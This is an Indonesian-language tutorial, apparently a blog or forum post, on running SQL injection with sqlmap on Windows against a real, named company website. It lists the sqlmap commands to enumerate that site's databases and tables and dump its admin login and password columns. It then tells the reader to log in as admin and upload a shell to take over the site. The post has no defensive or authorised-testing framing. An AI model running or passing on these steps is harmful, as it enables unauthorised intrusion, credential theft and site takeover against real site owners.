SQLI Dengan Memakai Sqlmap Di Windows

Pertama yang harus di siapkan adalah

• SQLMAP(Cari Di Google)
• CMD
• Website Yang VULN
• Python)Cari Di Google)

Yuk langsung ke tutornya  :

1. Buka CMD(Command Prompt)

2.Lalu ketikkan

cd c:/sqlmap

3.Yang berwarna Merah Itu adalah lokasi tempat sqlmap nya
4.Lalu Ketik lagi di cmd,lalu enter

sqlmap.py -u http://www.focalink.com.tw/product_en.php?classmaster=15 --dbs 

nb:yang berwarna merah itu adalah web yang VULN

5.Jika Web benar2 vuln,maka akan muncul seperti ini(Nama Databasenya)

6.Lalu untuk menampilkan isi dari DB nya kita ketikkan perintah berikut di cmd kita

sqlmap.py -u http://www.focalink.com.tw/product_en.php?classmaster=15 -D focalink_focalink --tables

 Maka akan muncul seperti ini

7.lalu kita akan memunculkan isi dari tables di DB yang berisi username dan password admin,cth saya ambil dari tables sysconfig

sqlmap.py -u http://www.focalink.com.tw/product_en.php?classmaster=15
-D focalink_focalink -T sysconfig --column

 Maka akan muncul isi dari sysconfig


8.Tara...kita tinggal mengambil id/user dan pass dari web tsb,cthnya :sysloginid dan sysloginpw,

sqlmap.py -u http://www.focalink.com.tw/product_en.php?classmaster=15D focalink_focalink -T sysconfig -C sysloginid,sysloginpw --dump

Maka Akan muncul id dan passnya...

9.Lalu Kita Login ke adminnya ,dan taraaaa masuk ke admin page nya..

10.Sekarang kita tinggal upload shell,dan taraaaaa....,bebas tinggal mau diaapain tuh site


NB:

--dbs ( memanggil semua database yang ada dalam server )
--tables ( memanggil table yang ada di dalam database )
--column ( memanggil kolom yang ada di dalam database table )
--dump ( memanggil username dan password yg terdapat di dalam database tabel )

Sekian tutor dari ane semoga membantu :D